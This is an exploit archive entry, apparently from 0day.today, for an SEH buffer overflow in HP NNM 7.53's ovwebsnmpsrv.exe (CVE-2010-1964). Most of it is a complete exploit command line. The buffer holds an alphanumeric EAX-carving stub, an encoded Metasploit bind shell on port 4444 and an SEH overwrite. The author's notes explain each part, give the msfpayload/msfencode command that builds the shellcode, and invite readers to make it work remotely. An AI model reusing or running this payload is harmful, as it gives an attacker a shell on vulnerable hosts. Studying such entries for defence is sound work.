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HP NNM 7.53 ovwebsnmpsrv.exe Buffer Overflow (SEH)
================================================== HP NNM 7.53 ovwebsnmpsrv.exe Buffer Overflow (SEH) ================================================== # Exploit Title: HP NNM 7.53 ovwebsnmpsrv.exe Buffer Overflow (SEH) # Date: 07/06/2010 # Author: bitform # Software Link: hp.com # Version: 7.53 # Tested on: Windows XP SP2 # CVE: CVE-2010-1964 # Exploit: C:\Program Files\HP OpenView\www\bin\ovwebsnmpsrv.exe -dump AAAAAAAAAAAAUXf-9Tf-9Tf-9TU\AAAAAAAAAAAAAAAAAAAAAPYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIIlIxMYC0EPGpCPNiJEP1KbQtLKPRFPLKF2DLNkF2EDNkD2ExFoMgPJDfDqIoEaIPNLElPaQlFbDlGPJaHODMFaIWKRL0QBF7LKBrFpLKQRElFaJpNkQPD8OuIPCDCzEQHPF0LKQXGhNkBxEpEQHSKSElQYLKDtLKFaKfP1KOP1KpLlIQJoDMGqO7DxM0BUJTFcCMIhGKQmQ4CEKRBxLKBxQ4FaN3E6NkDLPKLKBxELEQJsLKC4NkC1HPMYG4GTQ4QKQKCQPYQJCaKOIpBxQOCjLKDRHkMVCmE8GCFRGpC0E8BWCCP2CoPTPhPLQgFFDGIoJuOHNpEQGpGpQ9HDPTBpBHFIMPPkGpIoKePPPPPPBpG0F0G0F0QxJJDOKoM0KOHULIO7DqIKQCE8C2GpFqQLK9HfPjDPCfCgPhIRIKEgE7KOIEBsBwBHH7KYDxKOIoJuQCCcF7PhQdJLEkKQKON5QGOyIWE8QeBNPMQqKON5BHQsBME4C0NiJCBwBwQGP1L6PjGbPYCfKRImBFO7G4FDGLC1FaNmPDGTFpKvGpG4QDPPCfQFF6CvBvBnBvF6QCQFBHQiJlEoNfKOJuK9IpBnF6CvIoP0BHDHOwGmCPKOHUMkJPH5MrF6BHMvJ5MmOmKOJuElDFCLFjOpKKM0BUEUOKG7GcQbBOCZC0CcKON5DJAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYY5AZCCX,Y,XP\SX-1UUU-1PPP-N_ZZPSX-zzzd-{zzd-{zzMPCCCCCCCCCCCCCCCCCCCCCCCCCCCC # Notes: This is the result of my research on CVE-2010-1964. Finding this vulnerability locally was trivial but getting a remote exploit via jovgraph.exe never quite worked out for me. I'm hoping someone will be able to make this a practical remote exploit. :D Overflowing many of the other command line options will overwrite SEH as well (e.g. -demo) Explanation of buffer: "UXf-9Tf-9Tf-9TU" Carve out EAX as the base register for the alphanumeric shellcode "PYIIIIIIIIIIIIIIII7QZ"... Alphanumeric bind shell # ./msfpayload windows/shell_bind_tcp LPORT=4444 RHOST= R | ./msfencode BufferRegister=EAX -e x86/alpha_mixed -t raw \/ Overwrite SEH [ ] "YY5AZCCX,Y,XP\SX-1UUU-1PPP-N_ZZPSX-zzzd-{zzd-{zzMP" [ ] /\ Carve out non-conditional jmp to carve EAX code # 0day.today [2024-12-27] #